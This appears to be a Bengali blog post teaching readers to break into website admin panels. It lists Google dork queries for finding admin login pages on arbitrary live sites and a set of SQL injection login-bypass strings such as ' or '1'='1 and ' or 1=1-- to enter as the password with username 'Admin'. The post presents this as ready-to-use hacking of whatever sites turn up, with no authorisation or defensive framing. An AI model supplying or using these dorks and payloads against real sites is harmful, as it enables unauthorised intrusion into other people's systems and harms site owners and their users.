এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে যে কোন একটি Google dork লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
- এখানে ইউজার নেম দিনঃ “Admin”
- তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
- তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন
thanks for comment me